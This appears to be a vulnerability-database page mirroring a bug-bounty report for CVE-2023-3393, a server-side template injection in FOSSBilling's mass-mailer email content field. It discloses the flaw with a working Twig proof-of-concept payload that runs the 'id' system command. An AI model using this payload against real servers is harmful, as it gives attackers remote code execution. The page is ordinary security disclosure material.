Lucene search
Hiu240900E4DF9280-900A-407A-A07E-E7FEF3345914HistoryJun 15, 2023 - 4:44 p.m.
Server-Side Template Injection leads to Remote Code Execution
2023-06-1516:44:55
hiu240900
www.huntr.dev
4
server-side template injection
remote code execution
admin
staff
mass mailer permission
email content field
bug bounty
0.001 Low
EPSS
Percentile
45.3%
Description
Admin or Staff with “Mass mailer” permission can perform a Server-Side Template Injection attack
Proof of Concept
Log in as an admin or a staff who has “Mass mailer” permission, edit a message
In the “Email content” field, insert the following value and click “Update and preview”
{% apply markdown %}
Greeting from {{ ['id']|filter('system') }}
Your email is: {{ c.email }}
Order our services at {{ "order"|link }}
{{ guest.system_company.name }}
{% endapply %}
Observed that the command “id” was successfully executed
Related
nvd
nvd
CVE-2023-3393
2023-06-23 19:15:09
prion
prion
Code injection
2023-06-23 19:15:00
osv
osv
CVE-2023-3393
2023-06-23 19:15:09
cve
cve
CVE-2023-3393
2023-06-23 19:15:09
cvelist
cvelist
CVE-2023-3393 Code Injection in fossbilling/fossbilling
2023-06-23 18:11:49